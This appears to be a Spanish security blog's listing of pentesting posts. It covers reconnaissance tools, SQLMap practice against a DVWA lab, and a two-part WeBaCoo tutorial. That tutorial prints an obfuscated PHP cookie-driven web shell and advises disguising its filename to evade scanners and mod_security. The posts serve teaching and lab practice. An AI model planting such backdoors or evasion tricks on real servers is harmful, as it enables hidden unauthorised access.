Mostrando las entradas con la etiqueta Pentesting. Mostrar todas las entradas
Mostrando las entradas con la etiqueta Pentesting. Mostrar todas las entradas

19 de junio de 2017

WebApp Information Gatherer con #wig

Hoy les quería compartir una de esas herramientas geniales para iniciar los procesos de Pentesting y específicamente en su primera etapa que es la recolección de información.

Figura 1: WebApp Information Gatherer con wig

Se trata de wig - WebApp Information Gatherer, una herramienta escrita en Python3 para la línea de comandos que permite recopilar información de aplicaciones webs y de numerosos CMS tales como WordPress, Joomla!, Drupal, Magento, PHPbb, phpMyAdmin, entre los más populares.

Con un dato un poco más técnico, wig utiliza una base de inferencia por ejemplo de firmas md5, expresiones regulares, cabeceras, etc para determinar algunas versiones específicas de alguno de los productos mencionados.

Figura 2: Firmas md5 en la base de conocimiento de wig

De esta manera, wig tiene como objetivo buscar y exponer la mayor cantidad de información posible, como tecnologías que se utilizan en un determinado proyecto web, subdominios encontrados para el dominio especificado en el escaneo, archivos y directorios interesantes y por supuesto enlaces a las vulnerabilidades detectadas.

Por otro lado, wig permite brindar recomendaciones sobre otras herramienta que se podría utilizar para obtener más información una vez detectado algún producto.

Para obtener wig, es posible clonar su repositorio a su ordenador local de la siguiente manera:

$ git clone https://github.com/jekyc/wig.git

Para comprender y ver una demo de como wig nos puede ayudar en nuestras auditorías, les comparto un pequeño video.


Saludos!

Enlace | wig - WebApp Information Gatherer en GitHub

3 de noviembre de 2016

Obtener información de dominios con #dnsenum

Dentro de las fases de un Test de Intrusión o Pentesting sobre una infraestructura, encontramos la recopilación de información. Esta fase consiste en obtener desde diferentes fuentes información valiosa sobre el objetivo que se va a auditar.

Este punto, aunque mucho los subestiman, es el más importante, ya que toda la información que se obtiene de esta fase va a ser el hilo conductor para los siguientes pasos.

Por otro lado, muchos de los objetivos que se van a auditar tiene una presencia en Internet, tienen servicios asociados, distintos dominios y este es el punto de inicio para comenzar a recopilar información.

Figura 1: DNS, Domain Name Servers

Si tienen presencia en Internet, cuentan con dominios y allí se pude desprender toda la información de servicios que el objetivo está brindando.

Es sabido que además los servidores de DNS no tienden a ser bien configurados, permitiendo en varios casos realizar consultas de transferencias de zona sobre determinadas peticiones y obtener más información de lo necesario.

Obtener información con dnsenum


De esta manera es que me recomendaron la herramienta dnsenum para aprovechar que mucha de la información que se requiere para iniciar una investigación.

dnsenum es una herramienta de línea de comandos escrita en Perl, con el objetivo de obtener la mayor información posible de los dominios especificados.

Se pude obtener dnsenum desde su repositorio en GitHub y clonarlo en local de la siguiente manera:

$ git clone https://github.com/fwaeytens/dnsenum.git

Alguna de las opciones que se puede obtener, son las siguientes:

$ perl dnsenum.pl -h

Figura 2: Opciones para la herramienta dnsenum

Una opción que más me gustó es la posibilidad de otorgar un archivo como diccionario ( -f, --file ) para realizar Fuerza Bruta y obtener más dominio ocultos o pocos visibles, como es el caso del archivo que incluye llamado dns.txt.

El resultado de dnsenum es un conjunto de dominios, NS, servidores de correo MX, Servidores de Mensajería, Servidores webs, muchas direcciones IP junto a sus rangos asignados y sin duda lo más importante, un buen punto de inicio para la siguiente fase.

Conclusiones


Es muy importante tener un panorama global de toda la infraestructura, muchas veces se intenta atacar o buscar vulnerabilidades directamente a servidores de Bases de Datos o aplicaciones web, cuando posiblemente la clave esté en "pivotar" dentro de la infraestructura por medio de servidores que no son tan importante pero que pueden llegar a tener los permisos necesarios para acceder a los más críticos.

Para ello, es necesario contar con información previa y una gran capacidad de inferencia para entender como está conformado los esquemas de servidores y otras conexiones.

28 de julio de 2014

Como fusionar GoLismero y SpiderFoot

Hace unos días estuvimos hablando de SpiderFoot, realmente una excelente herramienta de footprinting que el software libre nos regala y por otro lado, en algún momento estuvimos hablando sobre GoLismero, otra herramienta integradora ideal para el uso diario en nuestros pentesting.

Hoy les propongo mostrarle la forma de como integrar las búsquedas de SpiderFoot junto al poder de GoLismero, no se lo pierdan.

Dando el supuesto de que las dos herramientas ya la tenemos en nuestro entorno de prueba, directamente descargados desde sus repositorios en GitHub, lo primero que vamos a hacer es ejecutar el servidor de SpiderFoot de la siguiente manera:

$ cd spiderfoot/
$ python sf.py


30 de junio de 2014

GoLismero 2.0 Beta 3

Desde hace ya un tiempo, me dediqué a utilizar en mis Auditorías de Seguridad a la herramienta GoLismero y la verdad que desde el primero momento fue una experiencia única.


GoLismero


… es un Framework Open Source destinado al Pentesting. En la actualidad, está dirigido a la seguridad en aplicaciones web, pero es posible ampliarlo para otro tipos de aplicaciones o estructuras de sistemas. Tiene la capacidad de ejecutar sus propias pruebas de seguridad y utilizar una gran cantidad de herramientas de seguridad conocidas (OpenVas, Wfuzz, SQLMap, DNS recon, etc.) Una característica que la hace única a GoLismero, es la capacidad de retroalimentarse de información de cada plugin o herramienta y unificar de forma automática sus reportes.

Esta herramienta, se ejecuta en la consola de comandos, como lo dijimos anteriormente, está fundada desde sus inicio como Software Libre bajo la licencia GNU/GPLv2, es multiplataforma, debido que lo podemos ejecutar en Windows, GNU/Linux, *BSD y OSX, se encuentra programada en Python, es muy simple y rápido al momento de comenzar a usarla, existe la posibilidad de crear nuestros propios Plugins y colaborar al proyecto, unifica los reportes, etc. Con todas estas características, como no probar GoLismero y por que no colaborar al proyecto.

El equipo de GoLismero está compuesto por Daniel García ( @ggdaniel ), Mario Vilas ( @Mario_Vilas ) y Raúl Requero ( @rrequero )

31 de marzo de 2014

Ya se encuentra disponible w3af 1.6


Se acaba de publicar una nueva actualización de una de las herramientas de auditoría web más usadas en el mundo del Pentesting, ya está entre nosotros w3af 1.6

Luego de un excelente trabajo por parte de Andres Riancho, desde hoy se encuentra disponible una nueva actualización de w3af que nos sorprende con una mejora y optimización en el rendimiento de los escaneos, si hablamos de calidad en el código fuente se encuentran más de 1.300 unittest ejecutandose en servidores de integración contínua, además ahora es posible importar w3f a otros proyectos de forma muy simple con import w3af

Todo esto y algunas cosas más es lo que tenemos disponible en la versión 1.6 de w3af y para comenzar a utilizarlo podemos hacer lo siguiente

$ git clone https://github.com/andresriancho/w3af.git
$ cd w3af
$ ./w3af_gui

Para obtener una documentación más organizada y conocer a fondo las nuevas características que nos trae w3af no dejes de consultar la documentación oficial del proyecto.

17 de diciembre de 2013

Como crear un Backdoor con WeBaCoo (2 de 2)


Segunda y última parte de esta entrega, y la idea de hoy es en primer lugar crear nuestro backdoor con WeBaCoo y lograr comprometer un servidor, para evitar meternos en problemas vamos a utilizar DVWA y en particular su fallo en el menu de Upload.

Para evitar llamar la atención en los escaneadores de archivos e incluso en el mismo mod_security, les recomiendo que utilicen un nombre para su backdoor que no haga alusión a que es un backdoor sino un archivo más.

$ ./webacoo.pl -g -f 1 -o consulta.php

        WeBaCoo 0.2.3 - Web Backdoor Cookie Script-Kit
        Copyright (C) 2011-2012 Anestis Bechtsoudis
        { @anestisb | anestis@bechtsoudis.com | http(s)://bechtsoudis.com }

[+] Backdoor file "consulta.php" created.

Por defecto el código queda ofuscado, pero tenemos la opción con -r de no ofuscarlo al momento de generarlo.

$ cat consulta.php
<?php $b=strrev("edoced_4"."6esab");eval($b(str_replace(" ","","a W Y o a X N z Z X Q o J F 9 D T 0 9 L S U V b J 2 N t J 1 0 p K X t v Y l 9 z d G F y d C g p O 3 N 5 c 3 R l b S h i Y X N l N j R f Z G V j b 2 R l K C R f Q 0 9 P S 0 l F W y d j b S d d K S 4 n I D I + J j E n K T t z Z X R j b 2 9 r a W U o J F 9 D T 0 9 L S U V b J 2 N u J 1 0 s J F 9 D T 0 9 L S U V b J 2 N w J 1 0 u Y m F z Z T Y 0 X 2 V u Y 2 9 k Z S h v Y l 9 n Z X R f Y 2 9 u d G V u d H M o K S k u J F 9 D T 0 9 L S U V b J 2 N w J 1 0 p O 2 9 i X 2 V u Z F 9 j b G V h b i g p O 3 0 = "))); ?>

25 de noviembre de 2013

Como crear un Backdoor con WeBaCoo (1 de 2)

WeBaCoo

La idea de estos artículos es entender algunos conceptos y rápidamente ponerlos en práctica, haciendo uso de algunas herramientas para plantar nuestra bandera en las auditorios y pentesting que realicemos, en otras palabras es una buena forma de consolidar nuestro acceso y tomar control del servidor.

Antes les propongo conocer un poco más sobre los Backdoors, Wikipedia nos propone el siguiente concepto:

"En la informática, una puerta trasera (o en inglés backdoor), en un sistema informático es una secuencia especial dentro del código de programación, mediante la cual se pueden evitar los sistemas de seguridad del algoritmo (autentificación) para acceder al sistema. Aunque estas puertas pueden ser utilizadas para fines maliciosos y espionaje no siempre son un error, pueden haber sido diseñadas con la intención de tener una entrada secreta."

Ahora bien, conociendo este concepto y dada una cantidad de factores a nuestro favor, nosotros podríamos llegar a crear un backdoor para tener acceso en todo momento.

UN DATO CURIOSO


En el 90% de los defacement en sitios webs, sus atacantes dejan una puerta trasera creadas con algún scripts PHP Shell como c99Shell, r57shell o alguno similar, detectable por algun analizador de Log en el Servidor Web y subida al servidor por algún fallo en los permisos de un directorio, Remot File Include o una mala administración de las cuentas de usuarios administradores del sitio.

Desde hace tiempo, utilizo una herramienta para crear Backdoor en PHP llamada WeBaCoo.

1 de mayo de 2013

Bugtraq 2, una distribución GNU/Linux para Pentesting

Desde el Viernes 26 de Abril, se encuentra disponible para descargar Bugtraq 2, una excelente distribución basada en el sistema Operativo GNU/Linux destinada a los profesionales de la Seguridad Informática.


Me contacté con parte del equipo de Bugtraq 2 por vía Twitter, donde me recomendaron esta distribución basada en Ubuntu, por lo que solo me quedó descargarla, generar la imagen booteable desde un Pendrive y probarla.

El día de hoy me encuentro utilizando esta distribución, sin duda una excelente organización de las herramientas de seguridad de todo tipo que se puedan imaginar, es más muchas herramientas que solo se encontraban para sistemas Windows también la encontramos en Bugtraq 2 gracias a Wine, como es el caso de la FOCA entre otros.

8 de abril de 2013

Mundo Hacker TV - Ciberguerras

Ya se encuentra publicado el tercer capítulo de la tercera temporada de Mundo Hacker TV hablando sobre Ciberguerras, y en esta oportunidad con un par de especialistas como Chema Alonso y Ángel Ochoa.

Los invito a ver este interesante capítulo.


Saludos!

19 de marzo de 2013

Mundo Hacker TV - SPAM y Phishing

Comenzó la tercera temporada del video podcast más popular sobre seguridad informática, Mundo Hacker TV, esta vez con algunas novedades y es que ahora su contenido se emite en el canal Discovery Max, sin duda un gran logro para la difusión de todo el excelente contenido que nos tienen acostumbrado.

Con la Seguridad Informática como tema central, Mundo Hacker TV tiene el objetivo de cubrir todos los temas referidos mundo con profesionales en la materia como invitados.

Ya se encuentra publicado el primer capítulo de la tercera temporada con dos invitados de lujo, hablando sobre SPAM y Phishing, Lorenzo Martinez @lawwait y Yago Jesús @yjesus


17 de enero de 2013

Automatizando los accesos a FTP con accesos anonymous


En Julio del año pasado recuerdo haber publicado uno de los post más visitados en el blog, uno que hablaba de como es posible encontrar en el buscador Shodan los servidores FTP públicos con accesos del usuario anonymous, a día de hoy, después de 6 meses se encuentran indexadas más de 250.000 servidores, practicamente duplicando la cifra anterior.

En esta oportunidad encontré una herramienta llamado FtpScan que realiza la tarea de escanear en primer lugar aquellos servidores que se encuentran escuchando el puerto 21 de FTP y por otro lado nos indica aquellos que tienen acceso como Anonymous simplemente asignándole un rango de direcciones IPs.

16 de enero de 2013

Hacking en Buscadores


Hack x Crack es una comunidad de entusiastas hackers en donde realmente se comparte información muy interesante y es allí en donde quería aprovechar la oportunidad para compartir un Cuaderno técnico fantástico "Hacking en Buscadores".

Yo lo he descargado desde hace un tiempo y particularmente me ha gustado mucho, sobre todo la cantidad de contenido técnico, simple de entender y aplicarlo para sacar lo mejor de cada buscador.

Tengo la certeza de que si tiene este cuaderno en sus manos van, por un lado a aprender a realizar búsquedas más específicas y optimizadas y sacar partido de los buscadores más populares.

27 de diciembre de 2012

SQLMap Training: Wizard

Que les parece si comenzamos a "jugar" con SQLMap, para ello voy a asumir que ya tienen instalado en un entorno de desarrollo DVWA para evitar cualquier tipo de problema por inspeccionar y explotar este tipo de vulnerabilidades.

Por otro lado DVWA es un escenario de training fantástico que recomiendo a todos para iniciarse en la explotación de técnicas hacking mucho más de cerca.

Lo más interesante de DVWA es tratar de no utilizar las herramientas automatizadas para resolver cada uno de los retos planteados, pero como estamos en el Training de SQLMap vamos a saltear esa regla e intentar explotar el fallo de SQL Injection haciendo uso de esta herramienta.

Para los nuevos usuarios que recién se están iniciando en el uso de herramientas en consola, vallan haciéndose la idea que más allá de tener una pantalla en negro con un irritante cursor blanco esperando, hay un potencial increíble en esa consola y hoy por hoy existen muchas herramientas de seguridad que están programadas para que funciones directamente en la línea de comandos.

Entonces nos autenticamos en DVWA, lo primero que vamos a hacer dentro es modificar su seguridad, en la opción DVWA Security lo vamos a setear en low para ir comprendiendo la utilización de las herramientas.

Vamos hasta el menú que dice "SQL Injection" allí vamos a encontrar un input text esperando que le ingresemos algún dato para luego procesarla y ejecutar esa consulta.

Si le ingresamos un valor 1 obtenemos un resultado, y si pueden ver es posible copiar la URL con las variables GET utilizadas

http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

18 de diciembre de 2012

SQLMap Training: Actualización

Les propongo continuar con los Training de SQLMap, una excelente herramienta para realizar auditorías de seguridad y explotar vulnerabilidades de tipo Inyección SQL en Aplicaciones Web.

Actualización


Antes de utilizar estas herramientas de auditorías, les recomiendo actualizar a la última versión las herramientas que van a utilizar, en este caso SQLMap ya que tiene la particularidad de estar desarrollados por comunidades muy activas y se actualizan constantemente.

En Julio de este años, anunciamos que el proyecto migró todo su código fuente a los repositorios de GitHub y desde ahora utiliza un sistema de control de versiones distribuidos como es Git.

Lo interesante de todo esto, es que la actualización de nuestro SQLMap con Git es mucho más simple y lo podemos hacer de la siguiente manera:

17 de octubre de 2012

Buscando las páginas de login I


Estás auditando una web? De ser así, es muy probable que ya hallas recopilado toda la información necesaria para comenzar a realizar los escaneos de vulnerabilidades, a partir de ahora juega un papel muy grande la experiencia del profesional y las herramientas que podemos utilizar.

El primer punto a ubicar una vulnerabilidad es apoderarnos de una cuenta válida dentro del sistema o por lo menos conocer cuales son esos formularios de login tan codiciados.

La primera técnica válida pero no recomendada es la famosa “Play The Piano” que consiste en teclear lo que se les ocurra y esperar una respuesta favorable del lado del servidor, por supuesto que requiere de muchísimo tiempo que es posible que no lo tengamos.

Es por eso que en base a esta premisa comenzaron a crear herramientas que automatizan estas tareas, entonces las cosas se comienzan a ser un poco más simple.

Mi recomendación es, primero, leer el archivo robots.txt es posible que encontremos información muy interesante, generalmente se les indica por un Disallow los paneles de administración, un ejemplo clásico de todos los WordPress es indicarle a los buscadores que no indexaran nada de lo que se encuentra en el directorio wp-admin

17 de agosto de 2012

La Biblia del Footprinting

Si estás ligado a la informática, estás condenado a vivir actualizado, leer constantemente papers o documentos que se publican a diario mostrando información nueva y revisando nuevas tecnologías, ni hablar si tu trabajo está relacionado a la seguridad informática.

Hoy les quería recomendar un excelente eBook escrito por Juan Antonio Calles García y Pablo González Perez llamado "La Biblia del Footprinting" disponible para descargar desde su sitio Flue Project.

El Libro, sin duda, describe todas las fases del Footprinting que podemos realizar en las auditorías, cada uno de estos temas, se describen de forma simple acompañados de ejemplos y herramientas para recopilar más información.

3 de agosto de 2012

SQLMap Training: Instalación

Por estos días, la herramienta SQLMap está viviendo varios cambios y actualizaciones, por un lado la migración del sistema de control de versiones subversion a Git y por el otro lado nuevas mejoras en rendimiento y funcionalidades propias de la herramienta.

SQLMap es una potente herramienta de seguridad y pentesting que nos permite realizar inyección SQL en sitios y aplicaciones webs, desarrollada en el lenguaje de programación Python, bajo licencia GPL y es multiplataforma.

Instalación


Recientemente SQLMap está en GitHub por lo cual su instalación o la descarga de todos los archivos de la herramienta lo podemos hacer por medio de Git clonando el repositorio público, en la consola de comandos de GNU/Linux sería algo así

$ git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev Initialized empty Git repository in /home/dmaldonado/Programas/sqlmap-dev/.git/ remote: Counting objects: 32772, done. remote: Compressing objects: 100% (7413/7413), done. remote: Total 32772 (delta 25296), reused 32745 (delta 25271) Receiving objects: 100% (32772/32772), 31.72 MiB | 55 KiB/s, done. Resolving deltas: 100% (25296/25296), done. 


31 de julio de 2012

SQLMap migra a GitHub

Mientras actualizaba mis herramientas para realizar auditorías, me encontré que por estos días, SQLMap no solamente actualizó su sitio web oficial sino que además comenzó a migrar sus códigos fuentes a la red de GitHub.

Anteriormente el proyecto se encontraba utilizando subversion que poco a poco se está dejando de lado y que por otra parte Git comenzó a ganar terreno en este tipo de proyectos sociales y colaborativos.

Por lo que pude ver existen algunos tags migrados hasta la versión 0.9 aunque anteriormente estaba disponible una beta de la versión 1.0 y si tienen la posibilidad de seguirlo por medio de los commit pueden ver como los usuarios están colaborando constantemente.

25 de julio de 2012

GuadalajaraCON 2012 – RouterPWN 1.5.146

En esta conferencia, Pedro Joaquín nos mostrará en detalle el funcionamiento de RouterPWN para la explotación de vulnerabilidades en ruteadores.

Contiene actualmente 146 exploits que explotan vulnerabilidades como: evasión de autenticación, revelación de información y configuración, ejecución de comandos, cross site scripting, cross site request forgery, denegaciones de servicio, AtoC, etc.

También contiene 4 generadores de contraseñas entre los que destacan los generadores de claves inalámbricas de módems Thomson y Huawei.

Contiene exploits publicos y privados para las siguientes marcas: 2Wire, 3Com, Arris, Asmax, Belkin, Cisco, Comtrend, DD-Wrt, DLink, Fibrehome, Huawei, MiFi, Motorola, Netgear, Siemens, Thomson, TRENDnet, Ubiquiti, UTStarcom, Xavi y ZyXEL.

RouterPWN es un framework de explotación móvil, ya que permite, desde tu dispositivo móvil, configurar los exploits y lanzarlos a la dirección que gustes.


5 de julio de 2012

Conferencia de PenTesting en la Campus Party Colombia

Excelente conferencia por partes de Carlos Andrés Rodallega y John Jairo Hernandez para desarrollar entornos de entrenamiento para Pentest, donde nos va a permitir adquirir más conocimientos profesionales con escenarios y entornos reales para trabajar.


Entradas populares